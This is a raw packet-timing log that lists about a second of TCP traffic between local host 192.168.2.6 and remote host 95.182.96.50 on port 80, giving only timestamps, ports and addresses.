Oct 24, 2024 13:54:20.847424030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847451925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847500086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847505093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847553968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847587109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847604036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847620964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847628117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847656012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847690105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847702980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847723007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847726107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847759962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847806931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847827911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847862959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847888947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847897053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847927094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847933054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847949028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847966909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847971916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848016024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848041058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848068953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848090887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848099947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848104000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848149061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848155975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848205090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848208904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848243952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848287106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848294020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848342896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848345995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848387957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848397970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848442078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848448992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848484993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848490000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848520041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848526001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848558903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848575115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848619938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848628998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848664045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848706961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848715067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848750114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848757982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848784924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848800898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848839045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848859072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848872900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848889112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848911047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.848925114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848958969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.848993063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849010944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849029064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849031925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849051952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849064112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849071026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849097967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849103928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849152088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849196911 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849205017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849241018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849271059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849273920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849296093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849322081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849322081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849355936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849359035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849390030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849396944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849437952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849441051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849477053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849494934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849510908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849519014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849550009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849595070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849602938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849637985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849648952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849675894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849679947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849709988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849714994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849744081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849755049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849780083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849807024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849814892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849817991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849850893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849857092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849884987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849891901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849920034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849924088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849948883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.849962950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.849992990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850028992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850061893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850075006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850096941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850102901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850132942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850151062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850166082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850177050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850199938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850234985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850254059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850270033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850280046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850305080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850310087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850338936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850347042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850374937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850379944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850410938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850418091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850445032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850451946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850475073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850488901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850534916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850569010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850589037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850600958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850614071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850637913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.850647926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.850728989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.960319042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.960366964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.960395098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.960407019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.960436106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.960453987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.962507010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962594986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.962709904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962771893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962800026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.962826014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.962829113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962879896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962913990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962932110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.962949038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.962954998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963001966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963018894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963036060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963042974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963087082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963089943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963124037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963156939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963166952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963191986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963202000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963227987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963248968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963263035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963267088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963305950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963342905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963393927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963398933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963429928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963443041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963474035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963485956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963521004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963526011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963571072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963572979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963608980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963617086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963651896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963660955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963695049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963726997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963732004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963747025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963766098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963779926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963815928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963836908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963859081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963866949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963902950 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963934898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963947058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963968992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.963977098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.963999987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964015007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964035988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964081049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964091063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964092970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964143991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964150906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964190006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964206934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964238882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964272022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964284897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964306116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964313984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964356899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964359045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964410067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964415073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964451075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964452982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964484930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964497089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964523077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964569092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964575052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964611053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964620113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964646101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964659929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964682102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964692116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964716911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964725971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964770079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964771032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964833021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964848042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964869976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964876890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964905024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964920044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.964963913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.964998007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965010881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965033054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965042114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965068102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965076923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965116024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965121984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965158939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965171099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965193987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965198994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965234041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965239048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965274096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965291023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965342045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965372086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965394974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965394974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965428114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965439081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965462923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965471029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965497017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965506077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965532064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965539932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965568066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965584040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965603113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965605974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965636969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965673923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965675116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965708017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965742111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965754986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965775967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965784073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965811014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965835094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965845108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965850115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965881109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965888977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965914011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965924025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965950012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.965955019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.965985060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966012955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966020107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966053963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966058016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966088057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966120958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966142893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966155052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966180086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966187954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966206074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966223001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966270924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966272116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966306925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966340065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966353893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966375113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966382980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.966408968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.966454029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.075828075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.075874090 CEST	80	49714	95.182.96.50	192.168.2.6
